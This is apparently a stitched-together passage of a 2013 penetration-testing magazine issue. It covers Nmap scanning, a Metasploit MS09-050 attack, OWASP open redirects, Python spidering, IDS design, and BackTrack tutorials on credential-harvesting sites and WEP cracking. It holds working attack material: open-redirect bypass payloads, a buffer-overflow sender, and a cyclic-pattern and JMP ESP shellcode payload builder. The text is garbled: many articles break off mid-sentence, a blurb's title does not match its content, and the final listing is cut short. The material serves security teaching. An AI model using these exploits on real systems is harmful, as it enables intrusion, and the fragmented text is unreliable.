Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customers' specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own company's styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com

www.titania.com
Dear PenTest Readers!

But that's not all! We have also prepared something special for you: 3 articles that have never been published! They will be appearing in our magazine until January, but we give you the opportunity to read the most interesting ones now! Secure Coding, Cloud Pentesting, Analyze and Report. Interested? Open and find something for yourself!

Betatesters & Proofreaders: Steven Wierckx, David Jardin, Phil Patrick, Gilles Lami, L.Motz, Amit Chugh, Robin Schroeder, Jeff Smith, Sagar Rahalkar, Horace Parks, Johan Snyman, Dan Dieterle, Julian Esteves and others.

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine.

Senior Consultant/Publisher: Pawel Marciniak
CEO: Ewa Dudzic
ewa.dudzic@pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.
All trade marks presented in the magazine were used only for informative purposes.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Contents

Python for Coders and Pentesters
By Hitesh Choudhary
The Python programming language was a gift to the Web world by Guido van Rossum. Most of the time InfoSec evangelists need to write their Proof Of Concept [POC], we need to automate our attacks or customize some of our tools, and these tasks can create a lot of headaches.

Content-Based Intrusion Detection System
By Mark Sitkowski
In his article Mark Sitkowski shares his experience about dealing with intrusion detection systems, difficulties in searching for and choosing a perfect one, and provides you with a few hints on how to write your own.

Android Platform as a PenTesting
By Raheel Ahmad
There has been enough noise in the information security industry for generally talking about awareness in the area of mobile applications and devices. Industry leaders including McAfee, OWASP, Core Security & Secforce etc. have been consulting to deliver security assessment services in the corporate sector for mobile applications and devices, but there is now enough focus on using Android as a Penetration Testing Platform.

Android Vulnerability Analysis with Mercury Framework
By Patrik Fehrenbach

May Your Locality and Environment Be the Weakest Link: Physical Penetration Testing

Vulnerability Assessment and Management: Integrated Approach
By Muhammad Saleem
Vulnerability Assessment and Management is the core component of any security program. In the modern approach, to handle the latest security challenges and zero day attacks, we have to think like hackers think; our approach to handling vulnerabilities should be based on how hackers look at vulnerabilities.

Introduction to Unix and Linux

By Charles Chapman and Timothy Hoffman
Effective. Efficient. Lean and Mean. These words can all be used to describe Sockstress: a type of Denial of Service attack that zeroes right in via TCP to wreak havoc on large or small systems.

Secure Coding in C# .NET
By Gilad Ofir
As all of us programmers go day by day, writing more and more code, improving what's already written and developing
As the number of demands for penetration testing engagements gets higher, so does the demand for technical abilities. Clients who engage pentesters may also question the tools, the methodologies, the techniques, and the processes used when pentesting their systems. During meetings, clients may want to ask whether the tools used are automatic or manual. There might also be clients who prefer pentesters to perform manual labor rather than simply point and click. Of course, both methods have their good and bad sides. While the automatic (point and click) approach is fast, it may produce false positives; the manual way (researching and testing item by item) consumes more time but is usually more reliable. Depending on the time constraints and the number of systems involved, pentesters have to find a way to balance both methods in order to fulfil the requirements.

The Hacker's Methodology

The Methodology
Here we will go through four phases of the Hacking Methodology (Figure 1) plus one phase that we added, called Research:

Footprinting,
Scanning,
Enumeration,
Research,
Exploitation/Gaining Access.

Figure 1. The Hacker's methodology

Footprinting Phase
Footprinting is the phase of gathering information about computer systems and the companies they

Scanning Phase
Scanning is the technique an attacker performs before penetrating the network. During this phase specific vulnerabilities are identified and more detailed information is gathered, relying on the details compiled during the footprinting stage. As a result of the scanning phase, an attacker can retrieve critical information such as a map of the systems, the network devices, and the list of services and open ports. All this information will then be used in the later phase: Exploitation.
TBO 03/2013
find out whether the host is really up or down. We issue an Nmap command with the -sn switch (host discovery only, no port scan):

#nmap -sn <target host>

In Figure 2 we can see that, although our ping requests are being blocked, Nmap shows that the host is up: when run as root, -sn does not rely on ICMP echo alone but also sends a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request, so a host that silently drops echo requests can still be discovered.

--osscan-guess: perform OS detection and guess more aggressively when there is no perfect fingerprint match.

A note on the -n and -Pn switches when scanning a large range of IP addresses: -n disables reverse DNS resolution and always speeds the scan up. -Pn skips host discovery altogether and treats every address as up, which gets you past hosts that block ping, but it also makes Nmap port-scan every dead address in the range, so on a large range it costs time rather than saving it; use it for addresses you already know are alive.

In Figure 3 we can see the output of the scan result. It provides us with:

Figure 3. The output of the Nmap scan showing the services, versions and the OS details
Figure 4. Researching the vulnerabilities manually on the Internet
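Figure 3 is a screenshot, so here is an added example (not part of the article) of getting the same information out of the scan in a form a script can use. The same scan written with -oX produces XML; the following Python parses it and keeps only the open ports, their product/version strings and the best OS guess, which is what you carry into the research phase. The XML embedded in the script is a constructed sample in the -oX format, not output from the article's target, and 192.0.2.10 is a documentation address.

```python
# Added example (not from the article): parse the XML report written by
# "nmap -sV -O -oX scan.xml <target>" and pull out host state, open ports,
# service versions and OS guesses. The XML below is a constructed sample in
# the real nmap -oX layout, not captured output.
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.0.2.10">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135">
        <state state="open" reason="syn-ack"/>
        <service name="msrpc" product="Microsoft Windows RPC"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Microsoft Windows 2008 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
    <os>
      <osmatch name="Microsoft Windows Server 2008 SP1" accuracy="93"/>
      <osmatch name="Microsoft Windows 7" accuracy="88"/>
    </os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of dicts, one per host: state, open ports, OS guesses."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        state = host.find("status").get("state")
        ports = []
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue  # filtered/closed ports are not exposure; skip them
            svc = port.find("service")
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        os_guesses = [(m.get("name"), int(m.get("accuracy")))
                      for m in host.findall("os/osmatch")]
        hosts.append({"addr": addr, "state": state, "ports": ports, "os": os_guesses})
    return hosts


def best_os_guess(host):
    """Highest-accuracy osmatch, or None when nmap produced no OS fingerprint."""
    return max(host["os"], key=lambda m: m[1])[0] if host["os"] else None


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["addr"], h["state"], "os:", best_os_guess(h))
        for p in h["ports"]:
            print("  %d/%s %s %s %s" % (p["port"], p["proto"], p["service"],
                                        p["product"], p["version"]))
```

Run it against a real report by replacing SAMPLE_NMAP_XML with the contents of the -oX file; filtered ports are dropped on purpose, since a filtered 3389 tells you about a firewall rule, not about a service you can talk to.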
msf > search ms09_050

We will see that there are modules associated with MS09-050 and their description (Figure 6).

Using metasploit to check the information on the exploit
To get more information on the module, run:

msf > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index

This will show what kind of targets we can run this exploit against, as well as a brief description of the module (Figure 7).

Using Metasploit to set the exploit (Exploitation Phase)
Now it is time for us to exploit the target host with the information we gathered so far. On the metasploit console, we will use the exploit ms09_050_smb2_negotiate_func_index. By default, the exploit uses RPORT (remote port) 445 of the victim's machine and LPORT (local port) 4444 of the attacker's machine. We then set the target by entering its IP address in the RHOST field (Figure 9):

msf > set RHOST <target host>

Then we set our attacking machine as the LHOST (Figure 9):

msf > set LHOST <our attacking machine IP>

One caveat before pressing the trigger: this is a kernel-mode SMB2 bug, and a failed attempt crashes the target rather than just failing quietly, so on a client system agree in advance that a blue screen is an acceptable outcome.

Gaining Shell access (Gaining Access Phase)
So, when we execute exploit and if exploitation is successful, we will be able to get a meterpreter

Figure 6. Searching for the module ms09_050 to confirm if it is available in Metasploit
Figure 7. The output when checking for more information of the exploit module
Figure 8. Setting up the attack config before the exploit
Figure 9. Setting the target machine and attacking machine
Figure 10. The exploit in action. Meterpreter session is created providing us a shell session of the victim's machine

Fadli B. Sidek
Graduated with a BSc Degree in Cyber Forensics, Information Security Management and Business Information Systems, Fadli is a security professional at BT Global Services, a company that offers specialized IT security services to customers worldwide. He has over 7 years in the IT industry, dealing with operations, support, engineering, consulting, and currently, as ethical hacker, performing vulnerability assessment and penetration testing services in domains such as Network Assessments, Wireless Assessments, Social Engineering, Perimeter Device Assessment, and Web App Assessments through Open Source and commercial tools based on methodologies from OWASP and OSSTMM. Fadli has also conducted trainings and spoken at seminars on information security for both the private and government sectors. In his free time, Fadli conducts security research and regularly updates his blog focusing on IT security.
Personal Blog: http://securityg33k.blogspot.sg
Shortly: what is new in the list? Well... Risks A2 (Broken Authentication and Session Management) and A3 (Cross-Site Scripting (XSS)) swapped places, mostly because Broken Authentication has become more exploited and is a matter of vendor protection (there are more and more authentication solutions on the market), whereas Cross-Site Scripting is more complicated to prevent. Cross-Site Request Forgery (CSRF) moved from A5 to A8, mostly because the authors of the list considered that it has been on the list for more than 6 years and that developers have focused on it enough. A8 Failure to Restrict URL Access has changed to A7 Missing Function Level Access Control, with the motivation to cover all functions of access control. A6 Sensitive Data Exposure was created from two risks, A7 Insecure Cryptographic Storage and A9 Insufficient Transport Layer Protection. It covers protection of data from the moment it is sent by the user and stored in the application, to when it is sent back to the user's browser. A9 Using Known Vulnerable Components was previously part of A6 Security Misconfiguration, but was split out as the use of known vulnerable components increased.

In this article I will describe how to test a web application against A10 Unvalidated Redirects and Forwards. OWASP defines it thus: Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

It is one of the most popular attack vectors against financial institutions and their transaction systems, like e-banking. It means that an attacker can trick a user who thinks they are accessing your web application into visiting malicious content. Even experienced users can be tricked with this: in phishing attacks they see only a friendly link, or the attacker hides the destination with URL encoding.

Table 1. The updated OWASP Top 10 list (2013)
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Known Vulnerable Components
A10 Unvalidated Redirects and Forwards

How it works
One of the methods is to trick the user with a phishing mail that nests the attacker's URL inside a legitimate URL:

http://gooddomain.com/redirect/html?q=
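Added example, not part of the original article: a redirect handler written the way the A10 description warns about, a common half-fix that only checks whether the site's own host name appears somewhere in the parameter, and a hardened version that accepts only an allowlisted path on the site itself. The host name gooddomain.example and the parameter name q are assumptions; the payload list contains the nesting and encoding tricks mentioned above (the real host as a suffix of the attacker's, the real host in the query string, scheme-relative //, userinfo @, percent-encoded slashes, backslashes).

```python
# Added example (not from the article): an open-redirect handler as commonly
# written, next to a naive host check and a hardened version. Site name and
# parameter name are assumptions; the bypass strings are the classic payloads
# a tester tries against a redirect parameter.
from urllib.parse import urlsplit, urljoin, unquote

SITE = "https://gooddomain.example"
HOST = "gooddomain.example"


def vulnerable_redirect(q):
    """A10-style code: whatever the user supplied becomes the Location header."""
    return q


def naive_check_redirect(q):
    """A common 'fix': accept relative paths and anything mentioning our host."""
    if q.startswith("/") or HOST in q:
        return q
    return SITE + "/"


def safe_redirect(q, allowed_paths=("/account", "/login", "/")):
    """Only accept a relative path on our own site; anything else goes home.

    urljoin against SITE normalises the input, then we insist the result still
    has our scheme and host, contains no authority-separator tricks, and that
    the path sits under an allowlist. Rejected input is replaced, not reflected.
    """
    candidate = unquote(q)  # decode once so %2F / %5C tricks become visible
    target = urljoin(SITE + "/", candidate)
    parts = urlsplit(target)
    if parts.scheme != "https" or parts.netloc != HOST:
        return SITE + "/"
    if "\\" in candidate or candidate.startswith("//"):
        return SITE + "/"  # browsers treat \ like / and // as a new authority
    if not any(parts.path == p or parts.path.startswith(p + "/") for p in allowed_paths):
        return SITE + "/"
    return target


# Payloads a tester sends to the redirect parameter (all constructed).
PAYLOADS = [
    "/account",                                     # legitimate
    "https://evil.example/login",                   # plain external URL
    "https://gooddomain.example.evil.example/",     # our host as a suffix
    "https://evil.example/?x=gooddomain.example",   # our host in the query
    "//evil.example",                               # scheme-relative
    "https://gooddomain.example@evil.example/",     # userinfo trick
    "%2F%2Fevil.example",                           # URL-encoded //
    "/\\evil.example",                              # backslash confusion
]


def exercise(handler):
    """Map each payload to the redirect target the handler would emit."""
    return {p: handler(p) for p in PAYLOADS}


def leaks_offsite(results):
    """Payloads whose resulting Location would land on a host we do not own.

    Backslashes are folded to slashes because browsers parse them that way.
    """
    leaks = []
    for payload, target in results.items():
        normalised = unquote(target).replace("\\", "/")
        if urlsplit(urljoin(SITE + "/", normalised)).netloc != HOST:
            leaks.append(payload)
    return leaks


if __name__ == "__main__":
    for name, fn in [("vulnerable", vulnerable_redirect),
                     ("naive_check", naive_check_redirect),
                     ("safe", safe_redirect)]:
        print("%-12s leaks: %s" % (name, leaks_offsite(exercise(fn))))
```

Running it prints which payloads each handler would send off-site. The hardened version never reflects the input: anything it does not recognise is replaced by the home page, which is also what you want to see when testing a live redirect, since a 302 whose Location header still carries your marker host is the finding.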
Python for Coders and Pentesters
A word that needs no introduction for InfoSec coders

The solution to these problems can be a simple PY file. Easy to learn syntax and a huge set of third party libraries can simply solve our problems, and the best part is that Python is open source.

Target Audience
I would like to welcome all the coders as well as pentesters. The welcome of coders seems to be obvious, but pentesters might be wondering about the reason why they are welcome. This is to enable new pentesters (particularly those who are not considered as ninjas in coding) to learn the implementation of the various tools that are already created. The best part is that our favorite Operating System (BackTrack) is already enriched with scripts written in this language.

Scope
Most of the time when I write, read or learn any language or technology, the very first question that arises in my mind is the scope of the assets. With my experience in Information Security, Python is one of the best languages for automation or for creating our new tools. If you are interested in working with Java, .net, Game Development, Web application development, Socket programming, scripting, GUI and IT security programming, Python can be a one word answer. I would suggest visiting http://www.python.org at least once.

Hardware/Software Requirements
There are no hardware requirements for the interpreter of this language, although there are many software setups that you may prefer to play with. A platform that I recommend most of the time is Linux. But the Windows platform will do as well. For Linux users, you already are equipped with this weapon: just type python on your terminal. For Windows you will need to install it manually.

Understanding with a Real Case Study
Example for Coders
It would be very helpful for a coder to create a powerful web-spider with just a few lines of code. Most of the time searching for online information about the client is painful and it would be helpful for us if someone could automate this task. Usually a few lines of code in PHP or in Java can do it, but with Python we can make it much easier (Listing 1). Most of the code lovers will notice that the task of finding links and descriptions about a web based application can be simplified by this fifteen line script. Not only this, but SQLmap can also be added: output from this script can be fed into SQLmap
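Listing 1 is not reproduced here; the following is an added example in the same spirit, not the author's script. It spiders a site breadth-first while staying on the starting host, records each page's title and meta description, and lists the URLs that carry a query string, which are the ones to hand to sqlmap -u. So that it runs offline, pages are served from a constructed in-memory dictionary (target.example is a placeholder); replace fetch() with a real HTTP client once you have authorisation to crawl.

```python
# Added example (not from the article): a small spider that walks a site,
# collects links and page descriptions, and lists the URLs with query
# parameters for sqlmap. Pages come from a constructed in-memory site so the
# script runs offline; fetch() is the only thing to swap for a real crawl.
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample site: the spider never touches the network here.
SAMPLE_SITE = {
    "http://target.example/": """<html><head><title>Home</title>
        <meta name="description" content="Corporate portal"></head>
        <body><a href="/news.php?id=1">News</a> <a href="about.html">About</a>
        <a href="http://other.example/">Partner</a></body></html>""",
    "http://target.example/news.php?id=1": """<html><head><title>News</title></head>
        <body><a href="/news.php?id=2">Next</a> <a href="/">Home</a></body></html>""",
    "http://target.example/news.php?id=2":
        "<html><head><title>News 2</title></head><body></body></html>",
    "http://target.example/about.html": """<html><head><title>About</title>
        <meta name="description" content="Who we are"></head><body></body></html>""",
}


def fetch(url):
    """Stand-in for an HTTP GET; returns '' for unknown pages, like a 404 would."""
    return SAMPLE_SITE.get(url, "")


class LinkParser(HTMLParser):
    """Collects href targets, the <title> and the meta description of one page."""

    def __init__(self):
        super().__init__()
        self.links, self.title, self.description = [], "", ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "meta" and (a.get("name") or "").lower() == "description":
            self.description = a.get("content") or ""
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()


def crawl(start, max_pages=50):
    """Breadth-first crawl staying on the start host: {url: (title, description)}."""
    host = urlsplit(start).netloc
    seen, queue, pages = set(), deque([start]), {}
    while queue and len(pages) < max_pages:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        html = fetch(url)
        if not html:
            continue
        parser = LinkParser()
        parser.feed(html)
        pages[url] = (parser.title, parser.description)
        for href in parser.links:
            absolute = urljoin(url, href)
            if urlsplit(absolute).netloc == host:  # stay in scope
                queue.append(absolute)
    return pages


def injectable_candidates(pages):
    """URLs with a query string: the ones worth passing to sqlmap -u."""
    return sorted(u for u in pages if urlsplit(u).query)


if __name__ == "__main__":
    found = crawl("http://target.example/")
    for url, (title, desc) in found.items():
        print(url, "-", title, "-", desc)
    print("sqlmap candidates:", injectable_candidates(found))
```

The host check is what keeps the crawl inside the engagement scope: the link to other.example is seen but never followed.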
Figure 2. theHarvester script demonstration

Hitesh Choudhary
Hitesh Choudhary is an ethical hacker from India serving for free with the Rajasthan police to handle cyber crimes, as well as pursuing his wireless research at M.I.T., California. He has completed his RHCE, RHCSA, CEH and various other security certifications. His recent work for the code society can be seen at www.EduacationTube.net.
It's far more cost-effective to persuade the bank to let you have access to its database, via a back door. Then, you have access to all of the bank's resources, for the expenditure of a minimum of effort, and without even having to understand how the authentication system works.

On the other side of the fence, when your company's product actually is that bank's authentication system, and which it describes as "Uncrackable", you have to expect this to be like a red rag to a bull, as far as the world's hackers are concerned. Every day, dozens of them try to break the algorithm, but none ever succeed, so there is some excuse for the complacency which ensues. However, you soon notice that, for every front door attack, there are over a hundred attempts to totally bypass the authentication system, and get in via a back door. Now, after you've told the world that the authentication system is uncrackable, it would be rather embarrassing to find that the hackers had decided not to bother cracking it, but had broken into your authentication server instead, and hijacked your database.

You have no control over how the average bank, securities trading company or whoever uses your product configures their online access server or ATM machine, but you can lead by example, and make sure that your authentication server, at least, can be made hack-proof. Easy, right? All you need to do is to buy a device which will alert you as soon as it detects a hack attempt, and prevent it succeeding. If, after a few weeks of searching on the internet and talking to prospective suppliers, you find that nothing on the market will do what you want, what do you do? You write your own, of course...

Defining the problem
When we set up the infrastructure for our authentication server's website, we did all the right things. The only open port was port 80, there was no GET permission for cgi-bin, no POST permission for htdocs, all other methods like MOVE, DELETE, COPY etc. were disabled, and there were no interpreted scripts, like those written in Java, Perl, shell or Ruby. The only HTML page was index.html, and the other sixty four pages were dynamically created by the CGI, which was an executable written in a compiled language. That way, if a hacker ran Wget on our site, he'd have no additional clues as to which page called which CGI, or what any of the HTML variables meant.

Bulletproof. As far as it went, it certainly was. We had many connections each day, from the usual hopeful
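The lockdown described above amounts to a policy that a content-based check can enforce on every request: GET is acceptable only for index.html, the CGI accepts only POST, and no other method is served at all. The following added example, which is not the author's system, applies that policy to web server access log lines and counts violations per client, so that an address probing for back doors stands out from ordinary visitors. The log lines are constructed samples in Apache common log format, and the CGI path /cgi-bin/app is an assumption.

```python
# Added example (not the author's IDS): a content-based check over web server
# access log lines encoding the policy described in the text: only index.html
# may be fetched with GET, the CGI executable may only be reached with POST,
# every other method is refused, and path traversal is never legitimate.
# Log lines are constructed samples; /cgi-bin/app is an assumed CGI path.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

ALLOWED_GET = {"/", "/index.html"}
ALLOWED_POST = {"/cgi-bin/app"}

SAMPLE_LOG = """\
198.51.100.7 - - [03/May/2013:10:01:02 +0000] "GET / HTTP/1.1" 200 1043
198.51.100.7 - - [03/May/2013:10:01:03 +0000] "POST /cgi-bin/app HTTP/1.1" 200 2210
203.0.113.9 - - [03/May/2013:10:02:11 +0000] "GET /cgi-bin/app HTTP/1.1" 403 212
203.0.113.9 - - [03/May/2013:10:02:12 +0000] "GET /cgi-bin/../etc/passwd HTTP/1.0" 404 190
203.0.113.9 - - [03/May/2013:10:02:13 +0000] "POST /index.html HTTP/1.1" 405 201
203.0.113.9 - - [03/May/2013:10:02:14 +0000] "DELETE /cgi-bin/app HTTP/1.1" 405 201
203.0.113.9 - - [03/May/2013:10:02:15 +0000] "GET /admin.php HTTP/1.1" 404 190
"""


def classify(line):
    """Return None for a request the policy allows, else a short reason string."""
    m = LOG_RE.match(line)
    if not m:
        return "unparseable"
    method = m.group("method")
    path = m.group("path").split("?", 1)[0]   # policy is about the path, not the query
    if ".." in path or "//" in path:
        return "path traversal"
    if method == "GET":
        return None if path in ALLOWED_GET else "GET outside allowlist"
    if method == "POST":
        return None if path in ALLOWED_POST else "POST outside cgi-bin"
    return "disallowed method " + method


def analyse(log_text):
    """Group offending requests by client IP: {ip: Counter(reason -> count)}."""
    offenders = {}
    for line in log_text.splitlines():
        reason = classify(line)
        if reason is None:
            continue
        m = LOG_RE.match(line)
        ip = m.group("ip") if m else "?"
        offenders.setdefault(ip, Counter())[reason] += 1
    return offenders


def suspects(log_text, threshold=3):
    """IPs with at least `threshold` violations: the ones worth blocking."""
    return sorted(ip for ip, c in analyse(log_text).items() if sum(c.values()) >= threshold)


if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, dict(reasons))
    print("block:", suspects(SAMPLE_LOG))
```

Note that the server's own status codes (403, 404, 405) already refused every one of the probes; the point of the check is the second line of evidence, that a single client sent five requests the site could never legitimately need, which is what turns a log into an alert.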
During this process, if security issues are brought to the foreground, pentesters try to exploit them. Successful penetration results are presented to the system owners with recommendations to plug the loophole and all the operations needed to reproduce the attack.

Warning
Please consider that all materials in this PenTest magazine issue are intended for educational purposes only. You must not use the skills and information obtained from this reading to attack in any way a system for which you don't have specific authorization or ownership. Reproducing the experiments presented in this article on non-authorized systems is illegal in most of the world and you will ultimately bear the consequences, including very high fines and jail.

Quick overview of BackTrack
In the penetration testing community, a leader emerges: BackTrack. Since its first release on the 5th of February 2006 by Mati Aharoni, Devon Kearns and Offensive Security, BackTrack has become a large, stable, and well known distribution for penetration testing. BackTrack is a Linux distribution (Ubuntu-based in its 5.x releases, and therefore ultimately Debian-derived) built for specific purposes: digital forensics and penetration testing. BackTrack comes from the merger of two other distributions, WHAX and Auditor Security Collection, which were already focused on penetration testing. The latest release of BackTrack was published in August 2012 and is named BackTrack 5 R3. Here's a non-exhaustive list of BackTrack tool categories:

Information gathering;
Vulnerability assessment;
Exploitation tools;
Privilege escalation;
Maintaining access;
Reverse Engineering;
RFID tools;
Stress testing;
Forensics;
Reporting tools;
Services;
Miscellaneous.

Installation and Configuration
In order to follow our step-by-step tutorials and hands-on recipes, you must have access to three different virtual machines: one with BackTrack, one with Windows 7 and later one with Windows XP. We assume that you have a brand new installation of BackTrack. If not, you can download the lat-
ping 192.168.1.119

A ping is a special network packet, an ICMP echo request, sent to the host; a live host that is allowed to answer replies with an ICMP echo reply.

Figure 4. Social Engineering tool

Exploit
In this case we use SET to create a fake website to harvest credentials.

Figure 9. Reports
Where:
BSSID corresponds to the target BSSID;
filename-01.cap is the name specified during step 6, followed by -01.cap, which corresponds to the first trace file.

Aircrack-ng keeps updating the number of IVs captured by airodump-ng and generated by aireplay-ng. After a few minutes, the WEP key should appear by itself if the crack works (see Figure 16). If it does not, the usual reasons are:

The network has changed the key (you should know, because you are the AP owner);
The captured file is corrupted.

Figure 17. hciconfig -a
Bluetooth security
There are various hacks and a lot of software already available on different websites which help attackers compromise cell phones and multimedia phones over Bluetooth. Many manufacturers have, however, closed these security vulnerabilities. In this article, we have outlined only some Bluetooth hacking software and presented how to set it up.

hciconfig hci0 up

Where:
hci0 corresponds to your Bluetooth interface.

Now you should have your adapter up and working. To verify that all is OK, run this command: hciconfig -a (Figure 17).

Figure 19. sdptool
Start BackTrack.
Open the joomscan tool (you will find it in the BackTrack menu; see Figure 21).
To run the joomscan script use this command (see Figure 22):

./joomscan.pl -u <URL>

Where:
URL corresponds to our Joomla website. In this example the website is at 192.168.1.3/joomscan/

After a few seconds, we can see the Apache and Joomla versions reported by joomscan and all the website modules it found. As we can see, the version is not reported exactly; joomscan gives a range, here 1.5.12-1.5.14.

Figure 22. Running Joomscan

This imprecision comes from the technique joomscan uses to determine the version: it reads the version headers from the .ini files shipped with Joomla, and these are not always kept up to date. Treat the reported range as a hint and confirm the exact version by other means before choosing an exploit. Even so, the analysis helps you understand security in the CMS world.

After a few minutes, joomscan has checked all the vulnerabilities it knows about for your website and tells us whether our version is affected (see Figure 23). Now we can follow the 'Exploit' instruction to throw an exploit at our Joomla website.

If you would like to prevent attacks on your Joomla website, you can run this command: ./joomscan.pl defense and follow the instructions to make your CMS more secure.
Figure 39. Use auxiliary command
Figure 42. Module Execution complete
Figure 49. Remote system running processes
Figure 53. Access to the remote prompt
Buffer Overflow
In this section we will learn about an exploit based on buffer overflow techniques. A buffer overflow occurs when a program attempts to store more data in a buffer than the buffer was allocated to hold. Because buffers are created to hold a fixed amount of data, the excess spills over and corrupts or overwrites the adjacent memory; on the stack, that adjacent memory includes the saved return address, which is what makes the bug exploitable. Buffer overflows are a programming mistake; in this section we exploit a poorly written program by overflowing its buffer with executable code of our choice.

What you will learn:

Figure 54. OllyDBG GUI

Configuration
The target system is a Windows XP SP2 with:
OllyDbg (http://mathieu-nayrolles/pentestmag/victim/odbg.zip). OllyDbg is an assembler level analysing debugger for Windows. We will use this software to confirm the overflow and to locate a JMP ESP instruction that will redirect execution into our buffer.

Figure 55. Find a JMP ESP operation
The script used to send the oversized buffer (the original printed the same script twice; it is corrected here to define the buffer and to connect to the port rather than to the buffer):

#!/usr/bin/python
import socket

MyTarget = "1xx.xxx.xxx.x3"   # victim IP, masked as in the original
Port = 80
BUFFER_LEN = 2000             # assumed; the article does not give the length. Raise it until EIP reads 41414141 (Figure 56)
MyBuffer = b"A" * BUFFER_LEN  # 0x41 filler, so an overwritten EIP shows up as 41414141

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((MyTarget, Port))  # the original connected to (MyTarget, MyBuffer), which cannot work
sock.send(MyBuffer)
sock.close()

Figure 56. EIP overwritten to 41414141
Figure 57. ESP overwritten to Ch7Ch...
Figure 58. Confirm the buffer overflow
Figure 59. Remote Prompt access
Figure 60. Remote Prompt access
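Between Figure 56 (EIP full of A's) and Figure 58 sits the step the screenshots only hint at: sending a non-repeating pattern instead of A's, reading the overwritten EIP in OllyDbg (Figure 57 shows the pattern fragment Ch7Ch), turning that value into the exact overwrite offset, and then placing the JMP ESP address found in Figure 55 at that offset so that execution lands on the bytes that follow. The following is an added example, not one of the article's scripts: pattern_create and pattern_offset do what the Metasploit tools of the same names do, and build_payload lays out filler, return address, NOP sled and shellcode. The EIP value, JMP ESP address and shellcode bytes in the __main__ section are placeholders, not values from the article.

```python
# Added example (not part of the article's scripts): cyclic-pattern helpers
# and a payload builder for a classic stack overflow on 32-bit Windows.
# Values in __main__ are placeholders, not taken from the article.
import string
import struct


def pattern_create(length):
    """Cyclic 'Aa0Aa1Aa2...' string; every 4-byte window is unique within the first 20280 bytes."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    return "".join(out)[:length].encode()


def pattern_offset(eip_value, length=20280):
    """Offset of the 4 pattern bytes that landed in EIP.

    eip_value is the number the debugger displays; x86 is little-endian, so
    the bytes in memory are the reverse of the digits shown on screen.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern: overflow did not reach EIP")
    return idx


def build_payload(offset, ret_addr, shellcode, nop_len=16):
    """filler up to EIP | JMP ESP address (little-endian) | NOP sled | shellcode.

    After the overwritten RET executes, ESP points just past the return
    address, i.e. at the NOP sled, so JMP ESP slides into the shellcode.
    """
    return (b"A" * offset
            + struct.pack("<I", ret_addr)
            + b"\x90" * nop_len
            + shellcode)


if __name__ == "__main__":
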